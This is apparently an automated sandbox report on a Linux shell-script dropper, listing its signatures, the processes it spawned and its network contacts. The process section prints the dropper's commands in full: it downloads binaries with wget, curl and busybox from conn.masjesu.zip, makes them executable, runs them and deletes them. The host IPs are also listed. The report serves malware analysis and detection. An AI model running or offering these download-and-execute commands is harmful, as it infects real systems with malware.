Malware Analysis Report

2025-04-03 19:35

Sample ID 241028-csry6aydll
Target 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
SHA256 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1

Threat Level: Shows suspicious behavior

The file 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:20

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
